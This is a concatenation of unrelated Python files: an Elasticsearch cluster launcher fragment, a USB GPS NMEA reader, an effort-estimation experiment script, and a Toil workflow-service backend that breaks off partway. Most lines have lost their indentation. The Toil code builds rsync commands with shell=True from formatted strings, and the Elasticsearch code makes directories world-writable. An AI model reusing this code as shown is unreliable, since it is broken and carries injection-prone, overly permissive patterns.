mkdir(dirs.tmp)
chmod_r(dirs.tmp, 0o777)
mkdir(dirs.data)
chmod_r(dirs.data, 0o777)
mkdir(dirs.backup)
chmod_r(dirs.backup, 0o777)
# clear potentially existing lock files (which cause problems since ES 7.10)
    for root, _dirnames, files in os.walk(dirs.data, True):
        for f in files:
            if f.endswith(".lock"):
                rm_rf(os.path.join(root, f))
def build_elasticsearch_run_command(es_bin: str, settings: CommandSettings) -> List[str]:
cmd_settings = [f"-E {k}={v}" for k, v, in settings.items()]
return [es_bin] + cmd_settings
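# For illustration (values are made up):
#   build_elasticsearch_run_command("/opt/es/bin/elasticsearch",
#                                   {"http.port": "9200", "network.host": "localhost"})
#   == ["/opt/es/bin/elasticsearch", "-E http.port=9200", "-E network.host=localhost"]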
class ElasticsearchCluster(Server):
def __init__(
self, port=9200, host="localhost", version: str = None, directories: Directories = None
) -> None:
super().__init__(port, host)
self._version = version or constants.ELASTICSEARCH_DEFAULT_VERSION
self.command_settings = {}
self.directories = directories or self._resolve_directories()
@property
def version(self):
return self._version
def health(self):
return get_elasticsearch_health_status(self.url)
def do_start_thread(self) -> FuncThread:
# FIXME: if this fails the cluster could be left in a wonky state
# FIXME: this is not a good place to run install, and it only works because we're
# assuming that there will only ever be one running Elasticsearch cluster
install.install_elasticsearch(self.version)
self._init_directories()
cmd = self._create_run_command(additional_settings=self.command_settings)
cmd = " ".join(cmd)
user = constants.OS_USER_ELASTICSEARCH
if is_root() and user:
# run the elasticsearch process as a non-root user (when running in docker)
cmd = f"su {user} -c '{cmd}'"
env_vars = self._create_env_vars()
LOG.info("starting elasticsearch: %s with env %s", cmd, env_vars)
t = ShellCommandThread(
cmd,
env_vars=env_vars,
strip_color=True,
log_listener=self._log_listener,
)
t.start()
return t
def _log_listener(self, line, **_kwargs):
LOG.info(line.rstrip())
def _create_run_command(
self, additional_settings: Optional[CommandSettings] = None
) -> List[str]:
# delete Elasticsearch data that may be cached locally from a previous test run
dirs = self.directories
bin_path = os.path.join(dirs.install, "bin/elasticsearch")
# build command settings for bin/elasticsearch
settings = {
"http.port": self.port,
"http.publish_port": self.port,
"transport.port": "0",
"network.host": self.host,
"http.compression": "false",
"path.data": f'"{dirs.data}"',
"path.repo": f'"{dirs.backup}"',
}
if os.path.exists(os.path.join(dirs.mods, "x-pack-ml")):
settings["xpack.ml.enabled"] = "false"
if additional_settings:
settings.update(additional_settings)
self._settings_compatibility(settings)
cmd = build_elasticsearch_run_command(bin_path, settings)
return cmd
def _create_env_vars(self) -> Dict:
return {
"ES_JAVA_OPTS": os.environ.get("ES_JAVA_OPTS", "-Xms200m -Xmx600m"),
"ES_TMPDIR": self.directories.tmp,
}
def _settings_compatibility(self, settings):
# compatibility hacks for older versions
if int(self.version.split(".")[0]) <= 5:
settings["transport.tcp.port"] = settings["transport.port"]
del settings["transport.port"]
def _resolve_directories(self) -> Directories:
# by default, the cluster data will be placed in <data_dir>/elasticsearch/<version>/
return resolve_directories(version=self.version, cluster_path=self.version)
def _init_directories(self):
init_directories(self.directories)
class ProxiedElasticsearchCluster(Server):
"""
Starts an ElasticsearchCluster behind a localstack service proxy. The ElasticsearchCluster
backend will be assigned a random port.
"""
def __init__(
self, port=9200, host="localhost", version=None, directories: Directories = None
) -> None:
super().__init__(port, host)
self._version = version or constants.ELASTICSEARCH_DEFAULT_VERSION
self.cluster = None
self.cluster_port = None
self.directories = directories
@property
def version(self):
return self._version
def is_up(self):
# check service lifecycle
if not self.cluster:
return False
if not self.cluster.is_up():
return False
return super().is_up()
def health(self):
"""
calls the health endpoint of elasticsearch through the proxy, making sure implicitly that
both are running
"""
return get_elasticsearch_health_status(self.url)
def do_start_thread(self) -> FuncThread:
# start elasticsearch backend
if not self.cluster_port:
self.cluster_port = get_free_tcp_port()
self.cluster = ElasticsearchCluster(
port=self.cluster_port,
host=DEFAULT_BACKEND_HOST,
version=self.version,
directories=self.directories,
)
self.cluster.start()
self.cluster.wait_is_up()
LOG.info("elasticsearch cluster on %s is ready", self.cluster.url)
# start front-facing proxy
return start_proxy_for_service(
"elasticsearch",
self.port,
self.cluster_port,
update_listener=None,
quiet=True,
params={"protocol_version": "HTTP/1.0"},
)
def do_shutdown(self):
self.cluster.shutdown()
class CustomEndpoint:
enabled: bool
endpoint: str
def __init__(self, enabled: bool, endpoint: str) -> None:
self.enabled = enabled
self.endpoint = endpoint
if self.endpoint:
self.url = urlparse(endpoint)
else:
self.url = None
class EdgeProxiedElasticsearchCluster(Server):
"""
Elasticsearch-backed Server that can be routed through the edge proxy using an UrlMatchingForwarder to forward
requests to the backend cluster.
"""
def __init__(self, url: str, version=None, directories: Directories = None) -> None:
self._url = urlparse(url)
super().__init__(
host=self._url.hostname,
port=self._url.port,
)
self._version = version or constants.ELASTICSEARCH_DEFAULT_VERSION
self.cluster = None
self.cluster_port = None
self.proxy = None
self.directories = directories
@property
def version(self):
return self._version
@property
def url(self) -> str:
return self._url.geturl()
def is_up(self):
# check service lifecycle
if not self.cluster:
return False
if not self.cluster.is_up():
return False
return super().is_up()
def health(self):
"""
calls the health endpoint of elasticsearch through the proxy, making sure implicitly that
both are running
"""
return get_elasticsearch_health_status(self.url)
def do_run(self):
self.cluster_port = get_free_tcp_port()
self.cluster = ElasticsearchCluster(
port=self.cluster_port,
host=DEFAULT_BACKEND_HOST,
version=self.version,
directories=self.directories,
)
self.cluster.start()
self.proxy = EndpointProxy(self.url, self.cluster.url)
LOG.info("registering an endpoint proxy for %s => %s", self.url, self.cluster.url)
self.proxy.register()
self.cluster.wait_is_up()
LOG.info("elasticsearch cluster on %s is ready", self.cluster.url)
return self.cluster.join()
def do_shutdown(self):
if self.proxy:
self.proxy.unregister()
if self.cluster:
self.cluster.shutdown()
|
gps.py
|
"""Provides an interface to a USB GPS device."""
import utm
import time
import serial
import logging
import numpy as np
from threading import Thread
from datetime import datetime
import serial.tools.list_ports
logger = logging.getLogger(__name__)
class GPS():
"""GPS object."""
def __init__(self, comport=None, filename=None, baudrate=4800,
parity=serial.PARITY_NONE, stopbits=serial.STOPBITS_ONE,
bytesize=serial.EIGHTBITS):
"""Initialize."""
if comport is None:
comport = serial.tools.list_ports.comports()[0].device
self.serial_port = serial.Serial(comport, baudrate=baudrate,
parity=parity, stopbits=stopbits,
bytesize=bytesize)
self.filename = filename
self.timestamp = None
self.datestamp = None
self.lat = np.nan
self.lon = np.nan
self.alt = np.nan
self.utm_coords = None
self.running = True
self.acquired = False
self.thread = Thread(target=self._updater, daemon=True)
self.thread.start()
def _updater(self):
while self.running:
try:
ser_bytes = self.serial_port.readline()
decoded_bytes = ser_bytes.decode('utf-8')
if self.filename is not None and self.filename != '':
try:
with open(self.filename, 'a') as w:
w.write(decoded_bytes.strip() + '\n')
except FileNotFoundError:
                        logger.warning(f'Unable to find file {self.filename}.'
                                       ' Disabling GPS file stream.')
self.filename = None
                # Extract location information
data = decoded_bytes.split(",")
if 'GGA' in data[0]:
self._parse_gpgga(data)
if 'RMC' in data[0]:
self._parse_gprmc(data)
except UnicodeDecodeError:
time.sleep(1)
except serial.SerialException:
logger.warning('GPS disconnected!')
def _parse_gpgga(self, data):
try:
# Read timestamp
self.timestamp = datetime.strptime(data[1], '%H%M%S.%f').time()
# Read lat/lon info
lat_str = data[2]
lat_dir = data[3]
lon_str = data[4]
lon_dir = data[5]
            # Convert to decimal degrees
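            # NMEA packs degrees and minutes together: a (hypothetical) lat_str of
            # '4807.038' means 48 deg + 7.038 min -> 48 + 7.038/60 ~= 48.1173 deg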
if lat_str != '':
lat = float(lat_str[:2]) + float(lat_str[2:])/60
if lat_dir == 'S':
lat = -lat
self.lat = lat
if lon_str != '':
lon = float(lon_str[:3]) + float(lon_str[3:])/60
if lon_dir == 'W':
lon = -lon
self.lon = lon
# Unpack altitude
alt_str = data[9]
if alt_str != '':
alt = float(alt_str)
alt_unit = data[10]
# Convert from feet to meters if required
if alt_unit == 'F':
alt = 0.3048 * alt
self.alt = alt
# Convert to UTM units
try:
self.utm_coords = utm.from_latlon(lat, lon)
except UnboundLocalError:
pass
self.acquired = True
except ValueError as e:
            logger.warning(f'Error parsing GPS string\n{e}')
def _parse_gprmc(self, data):
"""Parse NMEA GPRMC string."""
try:
# Read timestamp
self.timestamp = datetime.strptime(data[1], '%H%M%S.%f').time()
# Read date stamp
self.datestamp = datetime.strptime(data[9], '%d%m%y').date()
# Read lat/lon info
lat_str = data[3]
lat_dir = data[4]
lon_str = data[5]
lon_dir = data[6]
            # Convert to decimal degrees
if lat_str != '':
lat = float(lat_str[:2]) + float(lat_str[2:])/60
if lat_dir == 'S':
lat = -lat
self.lat = lat
if lon_str != '':
lon = float(lon_str[:3]) + float(lon_str[3:])/60
if lon_dir == 'W':
lon = -lon
self.lon = lon
except ValueError as e:
            logger.warning(f'Error parsing GPS string\n{e}')
def get_position(self, time_to_wait=60):
"""Report current time and position."""
t0 = datetime.now()
        while (datetime.now() - t0).total_seconds() < time_to_wait:
            flags = [~np.isnan(self.lat), ~np.isnan(self.lon),
                     self.timestamp is not None, self.datestamp is not None]
            if np.array(flags).all():
                return [datetime.combine(self.datestamp, self.timestamp),
                        self.lat, self.lon, self.alt]
            time.sleep(0.1)  # brief pause to avoid busy-waiting for a fix
        logger.warning(f'No GPS fix acquired after {time_to_wait} seconds')
def close(self):
"""Close the connection."""
self.running = False
self.thread.join()
self.serial_port.close()
logger.info('GPS serial connection closed')
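if __name__ == '__main__':
    # Minimal usage sketch (illustrative only): assumes a GPS receiver is attached;
    # the constructor auto-detects the first available serial port by default.
    gps = GPS()
    fix = gps.get_position(time_to_wait=60)
    if fix is not None:
        timestamp, lat, lon, alt = fix
        print(timestamp, lat, lon, alt)
    gps.close()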
|
experiment.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (C) 2018, Jianfeng Chen <jchen37@ncsu.edu>, Tianpei Xia <txia4@ncsu.edu>
# vim: set ts=4 sts=4 sw=4 expandtab smartindent:
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import random
import sys
import time
import pdb
import os
from multiprocessing import Process
import numpy
from Main.methods import de_estimate, ga_estimate, random_strategy, nsga2_estimate, moead_estimate
from Main.methods import testing
from Optimizer.feature_link import calc_error1
from data.new_data import data_albrecht, data_desharnais, data_finnish, data_kemerer, data_maxwell, data_miyazaki, \
data_china, data_isbsg10, data_kitchenham
from utils.kfold import KFoldSplit_df
from sklearn.model_selection import train_test_split
from Main.cart import *
# from Optimizer.feature_link import mre_calc, msa
from Optimizer.errors import msa, mre
import numpy as np
import pandas as pd
f = lambda x: [ s[-1] for s in x.as_matrix()]
def DE2(AllSet, TrainSet, TestSet):
best_config, ngen = de_estimate(20, 2, data=TrainSet)
mre, sa, ci = calc_error1(best_config, TestSet, f(AllSet))
return {"mre": mre, "sa": sa, "config": best_config, "gen": ngen}
def DE8(AllSet, TrainSet, TestSet):
best_config, ngen = de_estimate(20, 8, data=TrainSet)
mre, sa, ci = calc_error1(best_config, TestSet, f(AllSet))
return {"mre": mre, "sa": sa, "config": best_config, "gen": ngen}
def RANDOM10(AllSet, TrainSet, TestSet):
best_config = random_strategy(10, data=TrainSet)
mre, sa, ci = calc_error1(best_config, TestSet, f(AllSet))
return {"mre": mre, "sa": sa, "config": best_config}
def RANDOM30(AllSet, TrainSet, TestSet):
best_config = random_strategy(30, data=TrainSet)
mre, sa, ci = calc_error1(best_config, TestSet, f(AllSet))
return {"mre": mre, "sa": sa, "config": best_config}
def ABE0(AllSet, TrainSet, TestSet):
best_config = [0, 0, 0, 0, 0, 0]
mre, sa, ci = calc_error1(best_config, TestSet, f(AllSet))
return {"mre": mre, "sa": sa, "config": best_config}
def DE30(AllSet, TrainSet, TestSet):
best_config, ngen = de_estimate(30, 250, data=TrainSet)
mre, sa, ci = calc_error1(best_config, TestSet, f(AllSet))
return {"mre": mre, "sa": sa, "config": best_config, "gen": ngen}
def GA100(AllSet, TrainSet, TestSet):
best_config, ngen = ga_estimate(100, 250, data=TrainSet)
mre, sa, ci = calc_error1(best_config, TestSet, f(AllSet))
return {"mre": mre, "sa": sa, "config": best_config, "gen": ngen}
def DE10(AllSet, TrainSet, TestSet):
best_config, ngen = de_estimate(10, 250, data=TrainSet)
mre, sa, ci = calc_error1(best_config, TestSet, f(AllSet))
return {"mre": mre, "sa": sa, "config": best_config, "gen": ngen}
def NSGA2(AllSet, TrainSet, TestSet):
best_config, ngen = nsga2_estimate(NP=100, NGEN=250, data=TrainSet)
mre, sa, ci = calc_error1(best_config, TestSet, f(AllSet))
return {"mre": mre, "sa": sa, "config": best_config, "gen": ngen}
def MOEAD(AllSet, TrainSet, TestSet):
best_config, ngen = moead_estimate(NP=4, NGEN=250, data=TrainSet)
mre, sa, ci = calc_error1(best_config, TestSet, f(AllSet))
return {"mre": mre, "sa": sa, "config": best_config, "gen": ngen}
def ATLM():
pass
def CART0(dataset, Trainset, TestSet):
Y_predict, Y_actual = cart(Trainset, TestSet)
_mre, sa = mre(Y_predict, Y_actual, f(dataset)), msa(Y_predict, Y_actual, f(dataset))
# print("mre: {0}, sa: {1}".format(_mre,sa))
return {"mre": _mre, "sa": sa, "config": None, "gen": None}
def CART_DE2(dataset, Trainset, TestSet):
learner = Cart
goal = "MRE"
train_X, train_Y= data_format(Trainset)
new_train_X, tune_X, new_train_Y, tune_Y = train_test_split(train_X, train_Y, test_size=0.3, shuffle=True)
test_X, Y_actual = data_format(TestSet)
params, evaluation = tune_learner(learner, new_train_X, new_train_Y,
tune_X, tune_Y, goal, num_population=20,repeats=2,life=20)
clf = learner(train_X, train_Y, test_X, Y_actual, goal).learner.set_params(**params)
clf.fit(train_X, train_Y)
Y_predict = clf.predict(test_X)
_mre, sa = mre(Y_predict, Y_actual, f(dataset)), msa(Y_predict, Y_actual, f(dataset))
# print("mre: {0}, sa: {1}".format(_mre,sa))
return {"mre": _mre, "sa": sa, "config": None, "gen": None, "params":params}
def CART_DE8(dataset, Trainset, TestSet):
learner = Cart
goal = "MRE"
train_X, train_Y= data_format(Trainset)
new_train_X, tune_X, new_train_Y, tune_Y = train_test_split(train_X, train_Y, test_size=0.3, shuffle=True)
test_X, Y_actual = data_format(TestSet)
params, evaluation = tune_learner(learner, new_train_X, new_train_Y, tune_X, tune_Y, goal, num_population=20, repeats=8,life=20)
clf = learner(train_X, train_Y, test_X, Y_actual, goal).learner.set_params(**params)
clf.fit(train_X, train_Y)
Y_predict = clf.predict(test_X)
_mre, sa = mre(Y_predict, Y_actual, f(dataset)), msa(Y_predict, Y_actual, f(dataset))
# print("mre: {0}, sa: {1}".format(_mre,sa))
params["actual_depth"] = clf.tree_.max_depth
return {"mre": _mre, "sa": sa, "config": None, "gen": None, "params":params}
def CART_DE10(dataset, Trainset, TestSet):
learner = Cart
goal = "MRE"
train_X, train_Y= data_format(Trainset)
new_train_X, tune_X, new_train_Y, tune_Y = train_test_split(train_X, train_Y, test_size=0.3, shuffle=True)
test_X, Y_actual = data_format(TestSet)
params, evaluation = tune_learner(learner, new_train_X, new_train_Y, tune_X, tune_Y, goal, num_population=10,repeats=250,life=5)
clf = learner(train_X, train_Y, test_X, Y_actual, goal).learner.set_params(**params)
clf.fit(train_X, train_Y)
Y_predict = clf.predict(test_X)
_mre, sa = mre(Y_predict, Y_actual, f(dataset)), msa(Y_predict, Y_actual, f(dataset))
# print("mre: {0}, sa: {1}".format(_mre,sa))
return {"mre": _mre, "sa": sa, "config": None, "gen": None}
def CART_DE30(dataset, Trainset, TestSet):
learner = Cart
goal = "MRE"
train_X, train_Y= data_format(Trainset)
new_train_X, tune_X, new_train_Y, tune_Y = train_test_split(train_X, train_Y, test_size=0.3, shuffle=True)
test_X, Y_actual = data_format(TestSet)
params, evaluation = tune_learner(learner, new_train_X, new_train_Y, tune_X, tune_Y, goal,num_population=30,repeats=250,life=5)
clf = learner(train_X, train_Y, test_X, Y_actual, goal).learner.set_params(**params)
clf.fit(train_X, train_Y)
Y_predict = clf.predict(test_X)
_mre, sa = mre(Y_predict, Y_actual, f(dataset)), msa(Y_predict, Y_actual, f(dataset))
# print("mre: {0}, sa: {1}".format(_mre,sa))
return {"mre": _mre, "sa": sa, "config": None, "gen": None}
def get_best_param(stats, this_best):
"""
:param stats: stats of one specific data set
:param this_best: current best parameters for one DE tuning
:return:
"""
for key, val in this_best.items():
stats[key] = stats.get(key,[]) + [val]
return stats
def exec(modelIndex, methodologyId, save_params=True):
"""
:param modelIndex:
:param methodologyId:
:return: writing to final_list.txt
^^^^ repeatID mre sa
"""
numpy.random.seed()
datafunc = [data_albrecht, data_desharnais, data_finnish, data_kemerer, data_maxwell, data_miyazaki,
data_china, data_isbsg10, data_kitchenham]
model = datafunc[modelIndex]
res = None
num_pj = len(model())
if num_pj < 40:
fold_num = 3
else:
fold_num = 10
# temp = {}
stats = {}
data_name = datafunc[modelIndex].__name__.split("_")[1]
for train, test in KFoldSplit_df(model(), fold_num):
if methodologyId == 0:
res = ABE0(model(), train, test)
if methodologyId == 2:
res = CART0(model(), train, test)
elif methodologyId == 4:
res = MOEAD(model(), train, test)
elif methodologyId == 5:
res = DE30(model(), train, test)
elif methodologyId == 6:
res = GA100(model(), train, test)
elif methodologyId == 7:
res = DE10(model(), train, test)
elif methodologyId == 8:
res = NSGA2(model(), train, test)
elif methodologyId == 9:
res = RANDOM10(model(), train, test)
elif methodologyId == 10:
res = RANDOM30(model(), train, test)
elif methodologyId == 11:
res = DE2(model(), train, test)
elif methodologyId == 12:
res = DE8(model(), train, test)
elif methodologyId == 13:
res = CART_DE2(model(), train, test)
elif methodologyId == 14:
res = CART_DE8(model(), train, test)
elif methodologyId == 15:
res = CART_DE10(model(), train, test)
elif methodologyId == 16:
res = CART_DE30(model(), train, test)
time.sleep(random.random() * 2) # avoid writing conflicts
        stats[data_name] = get_best_param(stats.get(data_name, {}), res.get("params", {}))  # not every method returns tuned params
if methodologyId == 0 or methodologyId == 9 or methodologyId == 10:
with open('final_list.txt', 'a+') as f:
# print("Finishing " + str(sys.argv))
f.write(
str(modelIndex) + ';' + str(methodologyId) + ';' + str(res["mre"]) + ';' + str(res["sa"]) + ';' +
str(res["config"]) + ';' + '\n')
elif methodologyId in [2, 13, 14, 15, 16]:
with open('final_Cart_DE.txt','a+') as f:
f.write(
str(modelIndex) + ';' + str(methodologyId) + ';' + str(res["mre"]) + ';' + str(res["sa"]) + ';' + '\n')
else:
with open('final_list.txt', 'a+') as f:
f.write(
str(modelIndex) + ';' + str(methodologyId) + ';' + str(res["mre"]) + ';' + str(res["sa"]) + ';' +
str(res["config"]) + ';' + str(res["gen"]) + '\n')
df = pd.DataFrame.from_dict(stats[data_name])
if save_params:
name = data_name+str(methodologyId)+".csv"
if os.path.exists(name):
with open(name, "a") as f:
df.to_csv(f, header=False, index=False)
else:
with open(name, "a") as f:
df.to_csv(f, header=True, index=False)
def run():
"""
system arguments:
1 modelIndex [0-albrecht, 1-desharnais, 2-finnish, 3-kemerer, 4-maxwell, 5-miyazaki, 6-china, 7-isbsg10, 8-kitchenham]
2 methodology ID [0-ABE0, 1-ATLM, 2-CART0, 3-CoGEE, 4-MOEAD, 5-DE30, 6-GA100,
7-DE10, 8-NSGA2, 9-RD10, 10-RD30, 11-DE2, 12-DE8, 13-CART_DE2,
14-CART_DE8, 15-CART_DE10,16-CART_DE30]
3 core Num, or the repeat times
:return:
"""
start_time = time.time()
if len(sys.argv) > 1:
modelIndex, methodologyId, repeatNum = int(sys.argv[1]), int(sys.argv[2]), int(sys.argv[3])
else: # for default local run
modelIndex, methodologyId, repeatNum = 0, 0, 1
if repeatNum == 1:
time2 = time.time()
exec(modelIndex, methodologyId)
print("total time = " + str(time.time() - time2))
sys.exit(0)
time1 = time.time()
p = list()
for i in range(repeatNum):
p.append(Process(target=exec, args=(modelIndex, methodologyId)))
p[-1].start()
for i in range(repeatNum):
p[i].join()
print("total time = " + str(time.time() - time1))
print("--- %s seconds ---" % (time.time() - start_time))
def run_testing():
"""
Debugging for a specific dataset under specified configuration indices.
repeat 100 times for 3 folds
:return:
"""
for _ in range(100):
for train, test in KFoldSplit_df(data_isbsg10(), 3):
mre, sa, p = (testing(train, test, [1, 3, 2, 0, 0, 3]))
print(mre)
print(sa)
if __name__ == '__main__':
run()
# run_testing()
|
toil_wes.py
|
import os
import json
import uuid
import subprocess
import urllib
from multiprocessing import Process
import functools
import logging
import sys
import time
from six import iteritems
from cwltool.main import load_job_order
from argparse import Namespace
from wes_service.util import WESBackend
from wes_service.errors import MissingAuthorization
logging.basicConfig(level=logging.INFO)
class LocalFiles(object):
"""
Convenience class for (r)syncing local files to a server.
"""
def __init__(self,
input_json,
wftype,
dest='~',
keypath='$HOME/.ssh/westest.pem',
domain='ubuntu@54.193.12.111'):
self.json_path = input_json
self.keypath = keypath
self.domain = domain
self.dest = dest
self.wftype = wftype
self.cwl_filemap = {}
self.filelist = []
def run_rsync(self, files):
for f in files:
cmd = 'rsync -Pav -e "ssh -i {}" {} {}:{}'.format(self.keypath, f, self.domain, self.dest)
logging.info(cmd)
p = subprocess.Popen(cmd, shell=True) # shell=True may be insecure? need advice
p.communicate() # block til finished
def new_local_path(self, filepath):
"""Stores the path in a list and returns a path relative to self.dest."""
self.filelist.append(filepath)
return os.path.join(self.dest, os.path.basename(filepath))
def wdl_pathmap(self, input):
"""
Very naive gather of all local files included in a wdl json.
Expects a json-like dictionary as input.
These paths are stored as a list for later downloading.
"""
# TODO: Parse and validate wdl to determine type
if isinstance(input, basestring):
if input.startswith('file://'):
return self.new_local_path(input[7:])
elif os.path.isfile(input):
return self.new_local_path(input)
else:
return input
if isinstance(input, list):
j = []
for i in input:
j.append(self.wdl_pathmap(i))
return j
        elif isinstance(input, dict):
            for k, v in iteritems(input):
                input[k] = self.wdl_pathmap(v)
            return input
        # other scalar types (numbers, booleans) pass through unchanged
        return input
def cwl_pathmap(self, json_dict):
"""
Gather local files included in a cwl json.
Expects a json dictionary as input.
These paths are stored as a list for later downloading.
"""
assert isinstance(json_dict, dict)
# use cwltool to parse the json and gather the filepaths
options = Namespace(job_order=[self.json_path], basedir=None)
json_vars, options.basedir, loader = load_job_order(options, sys.stdin, None, [], options.job_order)
for j in json_vars:
if isinstance(json_vars[j], dict):
if json_vars[j]['class'] == 'File':
if json_vars[j]['path'].startswith('file://'):
self.cwl_filemap[j] = json_vars[j]['path'][7:]
# replace all local top level key 'path's with new paths.
for k in json_dict:
if isinstance(json_dict[k], dict):
if 'class' in json_dict[k]:
if json_dict[k]['class'] == 'File':
# assume that if k is not in self.cwl_filemap, it is a File, but not local (file://)
if k in self.cwl_filemap:
json_dict[k]['path'] = self.new_local_path(self.cwl_filemap[k])
return json_dict
def sync2server(self):
"""
1. Opens a json, saves all filepaths within it as a list.
2. Rsyncs all of these files to the server.
3. Generates a new json for use on the server with server local paths.
"""
with open(self.json_path, 'r') as json_data:
json_dict = json.load(json_data)
new_json = self.cwl_pathmap(json_dict)
with open(self.json_path + '.new', 'w') as f:
json.dump(new_json, f)
logging.info('Importing local files from: ' + str(self.json_path))
logging.info('To: {}:{}'.format(self.domain, self.dest))
logging.info('New json with updated (server) paths created: ' + str(self.json_path + '.new'))
self.run_rsync(set(self.filelist))
return self.json_path + '.new'
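# Illustrative sketch of LocalFiles (the host, key path and JSON file are made up):
#
#     local = LocalFiles('job.json', wftype='cwl',
#                        keypath='~/.ssh/id_rsa', domain='user@example.com')
#     server_json = local.sync2server()  # rsyncs referenced files, returns 'job.json.new'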
def catch_toil_exceptions(orig_func):
"""Catch uncaught exceptions and turn them into http errors"""
@functools.wraps(orig_func)
def catch_exceptions_wrapper(self, *args, **kwargs):
try:
return orig_func(self, *args, **kwargs)
except RuntimeError as e:
return {"msg": str(e), "status_code": 500}, 500
except subprocess.CalledProcessError as e:
return {"msg": str(e), "status_code": 500}, 500
except MissingAuthorization:
return {"msg": "'Authorization' header is missing or empty, "
"expecting Toil Auth token", "status_code": 401}, 401
return catch_exceptions_wrapper
class ToilWorkflow(object):
def __init__(self, workflow_id):
super(ToilWorkflow, self).__init__()
self.workflow_id = workflow_id
self.workdir = os.path.join(os.getcwd(), 'workflows', self.workflow_id)
self.outdir = os.path.join(self.workdir, 'outdir')
os.makedirs(self.outdir)
self.outfile = os.path.join(self.workdir, 'stdout')
self.errfile = os.path.join(self.workdir, 'stderr')
self.starttime = os.path.join(self.workdir, 'starttime')
self.endtime = os.path.join(self.workdir, 'endtime')
self.pidfile = os.path.join(self.workdir, 'pid')
self.cmdfile = os.path.join(self.workdir, 'cmd')
self.request_json = os.path.join(self.workdir, 'request.json')
def write_workflow(self, request_dict, wftype='cwl'):
"""Writes a cwl, wdl, or python file as appropriate from the request dictionary."""
wf_filename = os.path.join(self.workdir, 'workflow.' + wftype)
if request_dict.get('workflow_descriptor'):
workflow_descriptor = request_dict.get('workflow_descriptor')
with open(wf_filename, 'w') as f:
# FIXME #14 workflow_descriptor isn't defined
f.write(workflow_descriptor)
workflow_url = urllib.pathname2url(wf_filename)
else:
workflow_url = request_dict.get('workflow_url')
input_json = self.write_json(request_dict)
if workflow_url.startswith('file://'):
workflow_url = workflow_url[7:]
if wftype == 'py':
return [workflow_url]
else:
return [workflow_url, input_json]
def write_json(self, request_dict):
input_json = os.path.join(self.workdir, 'input.json')
with open(input_json, 'w') as inputtemp:
json.dump(request_dict['workflow_params'], inputtemp)
return input_json
def call_cmd(self, cmd):
"""
Calls a command with Popen.
Writes stdout, stderr, and the command to separate files.
:param cmd: A string or array of strings.
:return: The pid of the command.
"""
with open(self.cmdfile, 'w') as f:
f.write(str(cmd))
stdout = open(self.outfile, 'w')
stderr = open(self.errfile, 'w')
logging.info('Calling: ' + ' '.join(cmd))
process = subprocess.Popen(cmd,
stdout=stdout,
stderr=stderr,
close_fds=True,
cwd=self.outdir)
stdout.close()
stderr.close()
return process.pid
def run(self, request_dict, opts):
wftype = request_dict['workflow_type'].lower().strip()
version = request_dict['workflow_type_version']
if version != 'v1.0' and wftype in ('cwl', 'wdl'):
raise RuntimeError('workflow_type "cwl", "wdl" requires '
'"workflow_type_version" to be "v1.0": ' + str(version))
if version != '2.7' and wftype == 'py':
raise RuntimeError('workflow_type "py" requires '
'"workflow_type_version" to be "2.7": ' + str(version))
if wftype in ('cwl', 'wdl'):
runner = ['toil-' + wftype + '-runner']
elif wftype == 'py':
runner = ['python']
else:
raise RuntimeError('workflow_type is not "cwl", "wdl", or "py": ' + str(wftype))
logging.info('Beginning Toil Workflow ID: ' + str(self.workflow_id))
with open(self.starttime, 'w') as f:
f.write(str(time.time()))
with open(self.request_json, 'w') as f:
json.dump(request_dict, f)
# write cwl/wdl, as appropriate
input_wf = self.write_workflow(request_dict, wftype=wftype)
cmd = runner + opts.getoptlist('extra') + input_wf
pid = self.call_cmd(cmd)
with open(self.endtime, 'w') as f:
f.write(str(time.time()))
with open(self.pidfile, 'w') as f:
f.write(str(pid))
return self.getstatus()
def getstate(self):
"""
Returns RUNNING, -1
COMPLETE, 0
or
EXECUTOR_ERROR, 255
"""
state = "RUNNING"
exit_code = -1
exitcode_file = os.path.join(self.workdir, "exit_code")
pid_file = os.path.join(self.workdir, "pid")
if os.path.exists(exitcode_file):
with open(exitcode_file) as f:
exit_code = int(f.read())
elif os.path.exists(pid_file):
with open(pid_file, "r") as pid:
pid = int(pid.read())
try:
(_pid, exit_status) = os.waitpid(pid, os.WNOHANG)
if _pid != 0:
exit_code = exit_status >> 8
with open(exitcode_file, "w") as f:
f.write(str(exit_code))
os.unlink(pid_file)
except OSError:
os.unlink(pid_file)
exit_code = 255
if exit_code == 0:
state = "COMPLETE"
elif exit_code != -1:
state = "EXECUTOR_ERROR"
return state, exit_code
def getstatus(self):
state, exit_code = self.getstate()
return {
"workflow_id": self.workflow_id,
"state": state
}
def cancel(self):
pass
def getlog(self):
state, exit_code = self.getstate()
if os.path.exists(self.request_json):
with open(self.request_json, 'r') as f:
request = json.load(f)
with open(self.errfile, 'r') as f:
stderr = f.read()
with open(self.cmdfile, 'r') as f:
cmd = f.read()
with open(self.starttime, 'r') as f:
starttime = f.read()
with open(self.endtime, 'r') as f:
endtime = f.read()
else:
request = ''
stderr = ''
cmd = ['']
starttime = ''
endtime = ''
outputobj = {}
if state == 'COMPLETE':
with open(self.outfile, 'r') as outputtemp:
outputobj = json.load(outputtemp)
return {
'workflow_id': self.workflow_id,
'request': request,
'state': state,
'workflow_log': {
'cmd': cmd,
'start_time': starttime,
'end_time': endtime,
'stdout': '',
'stderr': stderr,
'exit_code': exit_code
},
'task_logs': [],
'outputs': outputobj
}
class ToilBackend(WESBackend):
processes = {}
def GetServiceInfo(self):
return {
'workflow_type_versions': {
'CWL': {'workflow_type_version': ['v1.0']},
'WDL': {'workflow_type_version': ['v1.0']},
'py': {'workflow_type_version': ['2.7']}
},
